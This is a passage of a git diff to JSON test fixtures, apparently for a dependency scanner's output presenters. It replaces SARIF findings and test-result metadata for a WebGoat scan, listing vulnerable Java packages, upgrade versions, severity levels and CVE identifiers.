+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5341,10 +1901,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230364",
-          "level": "note",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569185",
+          "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-context package with a low severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5358,7 +1918,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-context@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5366,7 +1926,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5379,7 +1939,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.2.11"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5389,10 +1949,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230365",
-          "level": "note",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569186",
+          "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-core package with a low severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5406,7 +1966,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-core@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5414,7 +1974,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-test@3.2.11"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5427,7 +1987,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-test@3.2.11"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5437,10 +1997,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230366",
-          "level": "note",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569187",
+          "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-web package with a low severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5454,7 +2014,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-web@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5462,7 +2022,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5475,7 +2035,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.2.11"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5485,10 +2045,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230368",
-          "level": "note",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569189",
+          "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-webmvc package with a low severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -5502,7 +2062,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-webmvc@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5510,7 +2070,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5523,7 +2083,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.2.11"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5533,10 +2093,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-8230373",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569190",
           "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework:spring-webmvc package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5550,7 +2110,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework:spring-webmvc@6.0.13"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5558,7 +2118,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5571,7 +2131,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-web@3.2.11"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5581,10 +2141,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-6226862",
-          "level": "warning",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569191",
+          "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework.boot:spring-boot-actuator package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5598,7 +2158,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework.boot:spring-boot-actuator@3.1.5"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5606,7 +2166,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.1.6"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
               },
               "artifactChanges": [
                 {
@@ -5619,7 +2179,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-actuator@3.1.6"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
                       }
                     }
                   ]
@@ -5629,10 +2189,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORKBOOT-9804539",
-          "level": "warning",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977",
+          "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework.boot:spring-boot-actuator-autoconfigure package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5646,7 +2206,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework.boot:spring-boot-actuator-autoconfigure@3.1.5"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5654,7 +2214,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.3.11"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.19"
               },
               "artifactChanges": [
                 {
@@ -5667,7 +2227,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-actuator@3.3.11"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.19"
                       }
                     }
                   ]
@@ -5677,10 +2237,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254467",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-30385",
           "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework.security:spring-security-core package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5694,7 +2254,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework.security:spring-security-core@6.1.5"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5702,7 +2262,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-oauth2-client@3.1.9"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.9"
               },
               "artifactChanges": [
                 {
@@ -5715,7 +2275,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-oauth2-client@3.1.9"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.9"
                       }
                     }
                   ]
@@ -5725,10 +2285,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254468",
-          "level": "error",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3091180",
+          "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework.security:spring-security-oauth2-client package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -5742,7 +2302,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework.security:spring-security-oauth2-client@6.1.5"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5750,7 +2310,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-oauth2-client@3.1.9"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.20"
               },
               "artifactChanges": [
                 {
@@ -5763,7 +2323,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-oauth2-client@3.1.9"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.20"
                       }
                     }
                   ]
@@ -5773,10 +2333,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6254469",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-31394",
           "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework.security:spring-security-web package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5790,7 +2350,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework.security:spring-security-web@6.1.5"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5798,7 +2358,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-security@3.1.9"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.10"
               },
               "artifactChanges": [
                 {
@@ -5811,7 +2371,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-security@3.1.9"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.10"
                       }
                     }
                   ]
@@ -5821,10 +2381,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-6457293",
-          "level": "error",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3182897",
+          "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework.security:spring-security-core package with a high severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -5838,7 +2398,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework.security:spring-security-core@6.1.5"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5846,7 +2406,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-oauth2-client@3.1.10"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.20"
               },
               "artifactChanges": [
                 {
@@ -5859,7 +2419,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-oauth2-client@3.1.10"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.20"
                       }
                     }
                   ]
@@ -5869,10 +2429,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-8309135",
-          "level": "error",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-460764",
+          "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework.security:spring-security-web package with a critical severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -5886,7 +2446,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework.security:spring-security-web@6.1.5"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5894,7 +2454,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.7"
               },
               "artifactChanges": [
                 {
@@ -5907,7 +2467,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-security@3.2.11"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.7"
                       }
                     }
                   ]
@@ -5917,10 +2477,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-9486467",
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-8352924",
           "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.springframework.security:spring-security-crypto package with a critical severity vulnerability."
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -5934,7 +2494,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.springframework.security:spring-security-crypto@6.1.5"
+                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
                 }
               ]
             }
@@ -5942,7 +2502,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-oauth2-client@3.3.10"
+                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.21"
               },
               "artifactChanges": [
                 {
@@ -5955,7 +2515,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-oauth2-client@3.3.10"
+                        "text": "com.thoughtworks.xstream:xstream@1.4.21"
                       }
                     }
                   ]
@@ -5965,34 +2525,10 @@
           ]
         },
         {
-          "ruleId": "SNYK-JAVA-ORGTHYMELEAF-5811866",
+          "ruleId": "SNYK-JAVA-ORGAPACHECOMMONS-10734078",
           "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable org.thymeleaf:thymeleaf package with a critical severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "org.thymeleaf:thymeleaf@3.1.1.RELEASE"
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-ORGYAML-3152153",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable org.yaml:snakeyaml package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable org.apache.commons:commons-lang3 package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -6006,7 +2542,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.yaml:snakeyaml@1.33"
+                  "fullyQualifiedName": "org.apache.commons:commons-lang3@3.14.0"
                 }
               ]
             }
@@ -6014,7 +2550,7 @@
           "fixes": [
             {
               "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-validation@3.2.0"
+                "text": "Upgrade to org.apache.commons:commons-lang3@3.18.0"
               },
               "artifactChanges": [
                 {
@@ -6027,7 +2563,7 @@
                         "startLine": 1
                       },
                       "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-validation@3.2.0"
+                        "text": "org.apache.commons:commons-lang3@3.18.0"
                       }
                     }
                   ]
@@ -6037,10 +2573,10 @@
           ]
         },
         {
-          "ruleId": "snyk:lic:maven:ch.qos.logback:logback-classic:(EPL-1.0_OR_LGPL-2.1)",
-          "level": "warning",
+          "ruleId": "SNYK-JAVA-ORGJRUBY-10557730",
+          "level": "error",
           "message": {
-            "text": "This file introduces a vulnerable ch.qos.logback:logback-classic package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable org.jruby:jruby-stdlib package with a high severity vulnerability."
           },
           "locations": [
             {
@@ -6054,17 +2590,17 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "ch.qos.logback:logback-classic@1.4.11"
+                  "fullyQualifiedName": "org.jruby:jruby-stdlib@10.0.0.1"
                 }
               ]
             }
           ]
         },
         {
-          "ruleId": "snyk:lic:maven:ch.qos.logback:logback-core:(EPL-1.0_OR_LGPL-2.1)",
+          "ruleId": "snyk:lic:maven:ch.qos.logback:logback-classic:(EPL-1.0_OR_LGPL-2.1)",
           "level": "warning",
           "message": {
-            "text": "This file introduces a vulnerable ch.qos.logback:logback-core package with a medium severity vulnerability."
+            "text": "This file introduces a vulnerable ch.qos.logback:logback-classic package with a medium severity vulnerability."
           },
           "locations": [
             {
@@ -6078,7 +2614,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "ch.qos.logback:logback-core@1.4.11"
+                  "fullyQualifiedName": "ch.qos.logback:logback-classic@1.5.18"
                 }
               ]
             }
@@ -6102,31 +2638,7 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "com.github.jnr:jnr-posix@3.1.17"
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable org.hibernate.common:hibernate-commons-annotations package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "org.hibernate.common:hibernate-commons-annotations@6.0.6.Final"
+                  "fullyQualifiedName": "com.github.jnr:jnr-posix@3.1.20"
                 }
               ]
             }
@@ -6150,40 +2662,13 @@
               },
               "logicalLocations": [
                 {
-                  "fullyQualifiedName": "org.hibernate.orm:hibernate-core@6.2.13.Final"
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "snyk:lic:maven:org.jruby:dirgra:EPL-1.0",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable org.jruby:dirgra package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "org.jruby:dirgra@0.3"
+                  "fullyQualifiedName": "org.hibernate.orm:hibernate-core@6.6.29.Final"
                 }
               ]
             }
           ]
         }
-      ],
-      "automationDetails": {
-        "id": "Snyk/Open Source/webgoat/2025-11-12T17:36:30Z"
-      }
+      ]
     }
   ]
-}
\ No newline at end of file
+}
diff --git a/internal/presenters/testdata/ufm/webgoat.ignore.testresult.json b/internal/presenters/testdata/ufm/webgoat.ignore.testresult.json
old mode 100755
new mode 100644
index 6da97f729..bb37f2681
--- a/internal/presenters/testdata/ufm/webgoat.ignore.testresult.json
+++ b/internal/presenters/testdata/ufm/webgoat.ignore.testresult.json
@@ -1,13353 +1,100 @@
 [
   {
-    "testId": "0000005a-0000-4000-8000-00000000005a",
+    "testId": "bc866ada-6fdd-4793-8340-a811979692c5",
     "testConfiguration": {
       "local_policy": {
         "fail_on_upgradable": false,
-        "severity_threshold": "low",
-        "suppress_pending_ignores": false
-      },
-      "timeout": {
-        "outcome": "fail",
-        "seconds": 1200
-      }
-    },
-    "metadata": {
-      "project-name": "webgoat",
-      "display-target-file": "pom.xml",
-      "target-directory": "webgoat",
-      "dependency-count": 163
-    },
-    "createdAt": "2025-11-12T17:39:33.615146Z",
-    "testSubject": {
-      "locator": {
-        "paths": [
-          "pom.xml"
-        ],
-        "type": "local_path"
-      },
-      "type": "dep_graph"
-    },
-    "executionState": "finished",
-    "passFail": "fail",
-    "outcomeReason": "policy_breach",
-    "effectiveSummary": {
-      "count": 91,
-      "count_by": {
-        "result_type": {
-          "dast": 0,
-          "other": 0,
-          "sast": 0,
-          "sca": 91
-        },
-        "severity": {
-          "critical": 4,
-          "high": 45,
-          "low": 6,
-          "medium": 36,
-          "none": 0,
-          "other": 0
-        }
-      }
-    },
-    "rawSummary": {
-      "count": 91,
-      "count_by": {
-        "result_type": {
-          "dast": 0,
-          "other": 0,
-          "sast": 0,
-          "sca": 91
-        },
-        "severity": {
-          "critical": 4,
-          "high": 45,
-          "low": 6,
-          "medium": 36,
-          "none": 0,
-          "other": 0
-        }
-      }
-    },
-    "findingsComplete": true,
-    "problemStore": {
-      "CVE-2013-7285": {
-        "id": "CVE-2013-7285",
-        "source": "cve"
-      },
-      "CVE-2016-3674": {
-        "id": "CVE-2016-3674",
-        "source": "cve"
-      },
-      "CVE-2017-7957": {
-        "id": "CVE-2017-7957",
-        "source": "cve"
-      },
-      "CVE-2020-26217": {
-        "id": "CVE-2020-26217",
-        "source": "cve"
-      },
-      "CVE-2020-26258": {
-        "id": "CVE-2020-26258",
-        "source": "cve"
-      },
-      "CVE-2020-26259": {
-        "id": "CVE-2020-26259",
-        "source": "cve"
-      },
-      "CVE-2021-21341": {
-        "id": "CVE-2021-21341",
-        "source": "cve"
-      },
-      "CVE-2021-21342": {
-        "id": "CVE-2021-21342",
-        "source": "cve"
-      },
-      "CVE-2021-21343": {
-        "id": "CVE-2021-21343",
-        "source": "cve"
-      },
-      "CVE-2021-21344": {
-        "id": "CVE-2021-21344",
-        "source": "cve"
-      },
-      "CVE-2021-21345": {
-        "id": "CVE-2021-21345",
-        "source": "cve"
-      },
-      "CVE-2021-21346": {
-        "id": "CVE-2021-21346",
-        "source": "cve"
-      },
-      "CVE-2021-21347": {
-        "id": "CVE-2021-21347",
-        "source": "cve"
-      },
-      "CVE-2021-21348": {
-        "id": "CVE-2021-21348",
-        "source": "cve"
-      },
-      "CVE-2021-21349": {
-        "id": "CVE-2021-21349",
-        "source": "cve"
-      },
-      "CVE-2021-21350": {
-        "id": "CVE-2021-21350",
-        "source": "cve"
-      },
-      "CVE-2021-21351": {
-        "id": "CVE-2021-21351",
-        "source": "cve"
-      },
-      "CVE-2021-29505": {
-        "id": "CVE-2021-29505",
-        "source": "cve"
-      },
-      "CVE-2021-39139": {
-        "id": "CVE-2021-39139",
-        "source": "cve"
-      },
-      "CVE-2021-39140": {
-        "id": "CVE-2021-39140",
-        "source": "cve"
-      },
-      "CVE-2021-39141": {
-        "id": "CVE-2021-39141",
-        "source": "cve"
-      },
-      "CVE-2021-39144": {
-        "id": "CVE-2021-39144",
-        "source": "cve"
-      },
-      "CVE-2021-39145": {
-        "id": "CVE-2021-39145",
-        "source": "cve"
-      },
-      "CVE-2021-39146": {
-        "id": "CVE-2021-39146",
-        "source": "cve"
-      },
-      "CVE-2021-39147": {
-        "id": "CVE-2021-39147",
-        "source": "cve"
-      },
-      "CVE-2021-39148": {
-        "id": "CVE-2021-39148",
-        "source": "cve"
-      },
-      "CVE-2021-39149": {
-        "id": "CVE-2021-39149",
-        "source": "cve"
-      },
-      "CVE-2021-39150": {
-        "id": "CVE-2021-39150",
-        "source": "cve"
-      },
-      "CVE-2021-39151": {
-        "id": "CVE-2021-39151",
-        "source": "cve"
-      },
-      "CVE-2021-39152": {
-        "id": "CVE-2021-39152",
-        "source": "cve"
-      },
-      "CVE-2021-39153": {
-        "id": "CVE-2021-39153",
-        "source": "cve"
-      },
-      "CVE-2021-39154": {
-        "id": "CVE-2021-39154",
-        "source": "cve"
-      },
-      "CVE-2021-43859": {
-        "id": "CVE-2021-43859",
-        "source": "cve"
-      },
-      "CVE-2022-1471": {
-        "id": "CVE-2022-1471",
-        "source": "cve"
-      },
-      "CVE-2022-40151": {
-        "id": "CVE-2022-40151",
-        "source": "cve"
-      },
-      "CVE-2022-41966": {
-        "id": "CVE-2022-41966",
-        "source": "cve"
-      },
-      "CVE-2023-1973": {
-        "id": "CVE-2023-1973",
-        "source": "cve"
-      },
-      "CVE-2023-34053": {
-        "id": "CVE-2023-34053",
-        "source": "cve"
-      },
-      "CVE-2023-34055": {
-        "id": "CVE-2023-34055",
-        "source": "cve"
-      },
-      "CVE-2023-38286": {
-        "id": "CVE-2023-38286",
-        "source": "cve"
-      },
-      "CVE-2023-4639": {
-        "id": "CVE-2023-4639",
-        "source": "cve"
-      },
-      "CVE-2023-51775": {
-        "id": "CVE-2023-51775",
-        "source": "cve"
-      },
-      "CVE-2023-52428": {
-        "id": "CVE-2023-52428",
-        "source": "cve"
-      },
-      "CVE-2023-5379": {
-        "id": "CVE-2023-5379",
-        "source": "cve"
-      },
-      "CVE-2023-5685": {
-        "id": "CVE-2023-5685",
-        "source": "cve"
-      },
-      "CVE-2023-6378": {
-        "id": "CVE-2023-6378",
-        "source": "cve"
-      },
-      "CVE-2023-6481": {
-        "id": "CVE-2023-6481",
-        "source": "cve"
-      },
-      "CVE-2024-12798": {
-        "id": "CVE-2024-12798",
-        "source": "cve"
-      },
-      "CVE-2024-12801": {
-        "id": "CVE-2024-12801",
-        "source": "cve"
-      },
-      "CVE-2024-1459": {
-        "id": "CVE-2024-1459",
-        "source": "cve"
-      },
-      "CVE-2024-1635": {
-        "id": "CVE-2024-1635",
-        "source": "cve"
-      },
-      "CVE-2024-22234": {
-        "id": "CVE-2024-22234",
-        "source": "cve"
-      },
-      "CVE-2024-22243": {
-        "id": "CVE-2024-22243",
-        "source": "cve"
-      },
-      "CVE-2024-22257": {
-        "id": "CVE-2024-22257",
-        "source": "cve"
-      },
-      "CVE-2024-22259": {
-        "id": "CVE-2024-22259",
-        "source": "cve"
-      },
-      "CVE-2024-22262": {
-        "id": "CVE-2024-22262",
-        "source": "cve"
-      },
-      "CVE-2024-27316": {
-        "id": "CVE-2024-27316",
-        "source": "cve"
-      },
-      "CVE-2024-3653": {
-        "id": "CVE-2024-3653",
-        "source": "cve"
-      },
-      "CVE-2024-38809": {
-        "id": "CVE-2024-38809",
-        "source": "cve"
-      },
-      "CVE-2024-38816": {
-        "id": "CVE-2024-38816",
-        "source": "cve"
-      },
-      "CVE-2024-38819": {
-        "id": "CVE-2024-38819",
-        "source": "cve"
-      },
-      "CVE-2024-38820": {
-        "id": "CVE-2024-38820",
-        "source": "cve"
-      },
-      "CVE-2024-38821": {
-        "id": "CVE-2024-38821",
-        "source": "cve"
-      },
-      "CVE-2024-47072": {
-        "id": "CVE-2024-47072",
-        "source": "cve"
-      },
-      "CVE-2024-6162": {
-        "id": "CVE-2024-6162",
-        "source": "cve"
-      },
-      "CVE-2024-7885": {
-        "id": "CVE-2024-7885",
-        "source": "cve"
-      },
-      "CVE-2025-11226": {
-        "id": "CVE-2025-11226",
-        "source": "cve"
-      },
-      "CVE-2025-22228": {
-        "id": "CVE-2025-22228",
-        "source": "cve"
-      },
-      "CVE-2025-22235": {
-        "id": "CVE-2025-22235",
-        "source": "cve"
-      },
-      "CVE-2025-41234": {
-        "id": "CVE-2025-41234",
-        "source": "cve"
-      },
-      "CVE-2025-41242": {
-        "id": "CVE-2025-41242",
-        "source": "cve"
-      },
-      "CVE-2025-41249": {
-        "id": "CVE-2025-41249",
-        "source": "cve"
-      },
-      "CVE-2025-43857": {
-        "id": "CVE-2025-43857",
-        "source": "cve"
-      },
-      "CVE-2025-46551": {
-        "id": "CVE-2025-46551",
-        "source": "cve"
-      },
-      "CVE-2025-48924": {
-        "id": "CVE-2025-48924",
-        "source": "cve"
-      },
-      "CVE-2025-53864": {
-        "id": "CVE-2025-53864",
-        "source": "cve"
-      },
-      "CVE-2025-9784": {
-        "id": "CVE-2025-9784",
-        "source": "cve"
-      },
-      "CWE-113": {
